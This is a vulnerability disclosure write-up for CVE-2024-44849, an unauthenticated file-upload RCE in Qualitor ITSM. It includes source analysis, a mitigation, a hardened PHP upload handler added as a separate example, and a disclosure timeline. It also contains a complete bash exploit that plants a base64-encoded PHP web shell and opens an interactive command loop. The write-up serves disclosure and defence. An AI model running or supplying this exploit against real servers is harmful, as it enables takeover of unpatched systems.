CVE-2024-44849 - Unauthenticated RCE through Unrestricted File Upload

CVE-2024-44849 - CRITICAL Unauthenticated RCE through Unrestricted File Upload (<= Qualitor 8.24)

TL;DR


Description

CVE-2024-44849 is a critical unauthenticated remote code execution vulnerability in Qualitor ITSM that affects version 8.24 and all earlier versions.

Affected Versions

This vulnerability affects Qualitor 8.24 and all previous versions.

Impact

This vulnerability allows an unauthenticated attacker to upload an arbitrary file (for example a PHP web shell) to a web-accessible directory through an unrestricted file upload endpoint, and then execute commands on the server.

Before we move on to the technical details, it is important to understand what a CVE is. I have written a brief summary in the text below, in case you would like to know a little more.

What is a CVE?

CVE (Common Vulnerabilities and Exposures) is a public catalog of known vulnerabilities in software, hardware, or firmware, in which each entry receives a unique identifier (a CVE ID). The CVE program was created by the MITRE Corporation in 1999 to standardize the way security vulnerabilities are cataloged and shared, so that developers, system administrators, and security researchers can refer to a given vulnerability in a consistent manner.

A CVE should be cataloged when a security vulnerability in software, hardware, or dependencies affects the confidentiality, integrity, or availability of systems and is publicly known. Widely used or security-critical components such as libraries, protocols, and firmware should be registered.

Cataloging CVEs is crucial to standardizing the identification of flaws, allowing organizations and security professionals to implement fixes and protect their environments. This facilitates global coordination in responding to vulnerabilities and improves the overall security of the technology ecosystem, and it is our obligation as White Hats to ensure and contribute to information security.

CVE-2024-44849

Introduction

Qualitor is an ITSM software offered in the B2B (Business-To-Business) model. This means that other companies purchase the "Qualitor ITSM" license from the company "Qualitor Software e Servicos de Informatica S/A".

Qualitor ITSM has a large market share in Rio Grande do Sul, which is the 6th largest state in Brazil. It is normally hosted on-premises, and deployment can be done by the Qualitor team for a small service fee.

Reconnaissance

Some time ago, while creating new dorks to use in bug bounty programs, I found an exposed web server with directory listing enabled:

By accessing this server, it was possible to identify an exposed .git directory:

You can learn more about common Git weaknesses in the HackTricks book.

Exposed Credentials

Exploring the exposed directory, I identified cleartext credentials that could be used to gain access to the Qualitor ITSM source code:

Source Code Extraction

Using the same exposed URL with credentials, it was possible to obtain access to the Qualitor ITSM source code:

Exposing this credential makes it possible to identify vulnerabilities through source code analysis, and also opens the door to theft of intellectual property and unfair competition in the market.

Source Code Analysis

Since this is an ITSM, users are expected to be able to attach files to tickets, so I looked for a file that had file upload functions. When I found one, I compared it with another random ITSM file, and I identified that this PHP file for file uploads did not have any access control mechanisms:

Vulnerability Identification

After identifying the absence of access control mechanisms, I discovered that the file upload algorithm was vulnerable due to a lack of restrictions based on file heuristics or characteristics:

This flaw allows an attacker to upload any file type to the server without validation, posing a significant security risk. Without proper checks in place, an attacker could potentially upload malicious files (such as scripts or executables) that can later be executed or abused, leading to unauthorized access, privilege escalation, or code execution.

Now, let's see how this vulnerability arises in more technical details:

  • Line 12: $tempFile = $_FILES['fleArquivo']['tmp_name']; This line stores the temporary path of the uploaded file. At this point, no validation is performed on the type, content, or integrity of the file, so this is the first point where improper handling begins.

  • Line 113: $storeFolder = $_REQUEST['nmdiretoriorede']."/" . $_FILES['fleArquivo']['name']; Here, the destination path is built directly from user-provided input ($_REQUEST['nmdiretoriorede']) and the original file name, without any sanitization. Because the attacker controls both the directory and the file name, this also allows directory traversal and overwriting of existing files.

  • Line 115: $retorno = move_uploaded_file($tempFile, $storeFolder); This function moves the file from its temporary location to the final destination on the server. Since no validation was performed before this point, any file type, including a PHP script, is written to the location the attacker chose.

Exploit Source Code

To demonstrate the impact of this vulnerability in a practical way, I developed an exploit that exploits it automatically and provides a command shell on any host running a vulnerable Qualitor version, without any type of authentication:

#!/bin/bash

# Author: Extencil <extencil@extencil.me>
# Date: September, 2024.
#
# CVE-2024-44849 Unauthenticated Remote Code Execution Exploit

echo "
Qualitor Web <= 8.24 RCE Exploit v1.0 (CVE-2024-44849)
    
By Extencil <extencil@extencil.me>, September 2024.

Using this program to attack or compromise any company or system without mutual consent is illegal. The author of this code does not take any responsibility for any misuse or illegal activities conducted using this software. It is intended for educational purposes and authorized testing only. Always ensure you have proper authorization before conducting any security assessments.
"

URL="$1"

if [ $# -lt 1 ]; then
    echo "
Usage:
    $0 <url>
    $0 https://csc.extencil.me/html/ad/adfilestorage/request/checkAcesso.php
    "
else
    echo "[*] Exploiting the target.."
    # Define the file name and malicious content
    FILENAME=$(< /dev/urandom tr -dc 'a-z0-9' | head -c 16)".php"
    MALICIOUS_CODE='<?php $i=base64_decode("aWYoaXNzZXQoJF9QT1NUWzBdKSl7c3lzdGVtKCRfUE9TVFswXSk7ZGllO30K");eval($i);?>' # The Hackers Choice <thc.org> Smallest PHP Backdoor
    # The backdoor lands next to checkAcesso.php (nmdiretoriorede is set to ".")
    BACKDOOR_URL=$(echo "$URL" | sed 's/checkAcesso.php$//')"$FILENAME"

    # Boundary for multipart/form-data
    BOUNDARY="---------------------------QUALITORspaceCVEspace2024space44849"

    # Create the POST request with curl using inline file content
    echo "[*] Sending the backdoor.."
curl -X POST "$URL" -s --insecure \
  -H "Cookie: XDEBUG_SESSION=ECLIPSE_DBGP; XDEBUG_SESSION=ECLIPSE_DBGP; B_protocol=https%3A; XDEBUG_SESSION=ECLIPSE_DBGP; SOLICITANTE=false; _LOGIN_SOLICITANTE_=padrao; ATENDENTE=false; session820=" \
  -H "Content-Type: multipart/form-data; boundary=$BOUNDARY" \
  --data-binary "--$BOUNDARY
Content-Disposition: form-data; name=\"idtipo\"

2
--$BOUNDARY
Content-Disposition: form-data; name=\"nmfilestorage\"


--$BOUNDARY
Content-Disposition: form-data; name=\"nmdiretoriorede\"

.
--$BOUNDARY
Content-Disposition: form-data; name=\"nmbucket\"


--$BOUNDARY
Content-Disposition: form-data; name=\"nmaccesskey\"


--$BOUNDARY
Content-Disposition: form-data; name=\"nmkeyid\"


--$BOUNDARY
Content-Disposition: form-data; name=\"fleArquivo\"; filename=\"$FILENAME\"

$MALICIOUS_CODE
--$BOUNDARY
Content-Disposition: form-data; name=\"cdfilestorage\"


--$BOUNDARY--"

    echo 
    echo
    echo "[*] Target is vulnerable if 'Upload realizado com sucesso'."
    echo

    while true; do
    read -p "(backdoor@qualitor): $ " BackdoorCommand

    if [[ "$BackdoorCommand" == "exit" ]]; then
        echo "Exiting..."
        break
    fi

    # --data-urlencode keeps commands containing '&', '+' or '%' intact
    curl -s --insecure "$BACKDOOR_URL" --data-urlencode "0=$BackdoorCommand"
    done


fi

Also available on GitHub: https://github.com/extencil/CVE-2024-44849

Remediation / Fix / Mitigation

As of this moment, I have not received a formal response from the Qualitor team to mitigate this vulnerability.

However, you can TEMPORARILY mitigate this vulnerability by adding the line below to the checkAcesso.php file, before the upload code runs:

include("../../../../autentica.php");

Before (without fix) ❌❌❌:

After (with fix) ✅✅✅:

The line above pulls in Qualitor's native access control component, which only checks that the request comes from an authenticated user. It does not validate the upload itself, so any authenticated user (a regular user, without admin permissions) can still exploit this vulnerability.

This is not and should not be considered a definitive fix, but it is the most I can do to help protect your infrastructure until there is a formal response from the Qualitor team.
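As an added example (not Qualitor's code, and not part of the original write-up), the handler below shows what a hardened version of the upload routine analysed in the Source Code Analysis section looks like, with the authentication include from the mitigation above placed first. The storage directory, size limit and allow-list are illustrative assumptions; the relative path to autentica.php is the one used in the mitigation.

```php
<?php
declare(strict_types=1);

// Added example, not Qualitor's code: a hardened replacement for the upload
// handler whose lines 12, 113 and 115 are quoted in the analysis above.
// Assumptions: UPLOAD_DIR, MAX_UPLOAD_BYTES and ALLOWED are illustrative values.

// 1. Authentication before anything else. The original file had no access
//    control at all, which is what made the upload reachable unauthenticated.
require_once __DIR__ . '/../../../../autentica.php';

const UPLOAD_DIR       = '/var/lib/qualitor/anexos'; // assumed: outside the web root
const MAX_UPLOAD_BYTES = 20 * 1024 * 1024;
const ALLOWED          = [                           // extension => MIME type the bytes must match
    'pdf' => 'application/pdf',
    'png' => 'image/png',
    'jpg' => 'image/jpeg',
    'txt' => 'text/plain',
];

function fail(int $status, string $message): void
{
    http_response_code($status);
    echo $message;
    exit;
}

if ($_SERVER['REQUEST_METHOD'] !== 'POST' || !isset($_FILES['fleArquivo'])) {
    fail(400, 'Nenhum arquivo enviado');
}
$file = $_FILES['fleArquivo'];

// 2. Trust PHP's own upload bookkeeping, never request parameters.
if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
    fail(400, 'Upload invalido');
}
if ($file['size'] > MAX_UPLOAD_BYTES) {
    fail(413, 'Arquivo muito grande');
}

// 3. Allow-list the extension and verify that the content matches it.
//    A ".php" name is rejected here; a ".png" name with PHP inside is rejected
//    by the MIME check, because finfo looks at the bytes, not the name.
$ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
if (!array_key_exists($ext, ALLOWED)) {
    fail(415, 'Tipo de arquivo nao permitido');
}
$mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
if ($mime !== ALLOWED[$ext]) {
    fail(415, 'Conteudo nao corresponde a extensao');
}

// 4. Server-chosen destination: no $_REQUEST['nmdiretoriorede'] and no original
//    file name. The subdirectory comes from the server clock, the name from the CSPRNG.
$subdir = UPLOAD_DIR . '/' . date('Y/m');
if (!is_dir($subdir) && !mkdir($subdir, 0750, true)) {
    fail(500, 'Falha ao criar diretorio');
}
$dest = $subdir . '/' . bin2hex(random_bytes(16)) . '.' . $ext;

// Defence in depth: the resolved directory must still be inside UPLOAD_DIR.
$base = realpath(UPLOAD_DIR);
$real = realpath($subdir);
if ($base === false || $real === false
    || strncmp($real, $base . '/', strlen($base) + 1) !== 0) {
    fail(500, 'Diretorio de destino invalido');
}

if (!move_uploaded_file($file['tmp_name'], $dest)) {
    fail(500, 'Falha ao gravar o arquivo');
}
chmod($dest, 0640); // never executable, not world-readable

// The client-supplied name (basename($file['name'])) is metadata to store with
// the ticket record; it never becomes part of a filesystem path.
echo 'Upload realizado com sucesso';
```

With this in place, the request the exploit sends fails at step 3 (the ".php" extension is not in the allow-list), so the response is no longer "Upload realizado com sucesso" and nothing is written to disk. If attachments must be served back to users, do it through a download script that sets Content-Disposition: attachment; and if the directory has to live under the web root anyway, additionally disable PHP execution there at the web server level (for Apache with mod_php, php_admin_flag engine off in that directory's configuration; for nginx, no location block that passes that path to PHP-FPM).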

Timeline

This vulnerability was not cataloged by MITRE at the time I identified it. It was identified in June 2024 and immediately reported to the company through several channels:

  • LinkedIn: I contacted the IT and Infrastructure coordinators, no response.

  • WhatsApp: I contacted the support team via Qualitor's corporate number, no response (they only respond to WhatsApp for their customers)

  • E-mail: I sent e-mails to the contact addresses registered in Registro.BR's national whois database, but I also received no response.

Timeline in format: MM-DD-YYYY (Month, Day, Year)

06-03-2024 - Vulnerability Found
06-05-2024 - Vulnerability Reported via E-mail Domain Contact
06-17-2024 - Vulnerability Reported via LinkedIn
06-24-2024 - Vulnerability Reported via WhatsApp (Found the number on their website)
07-01-2024 - Vulnerability Reported via E-mail again
# Since no response from Qualitor, reported the vuln to MITRE Corporation
08-18-2024 - Vulnerability Reported to MITRE Corporation via CVE Form
09-06-2024 - Vulnerability Accepted by MITRE Corporation (Private Disclosure)
09-09-2024 - Vulnerability Published by MITRE Corporation (Public Disclosure)

My Special Thanks

I would like to thank my friends for their suggestions for registering this CVE.

  • Musa Attalah from NAVA;

  • Messede from The Hackers Choice;

  • Skyper from The Hackers Choice;

  • Clonazepunk from The Hackers Choice.
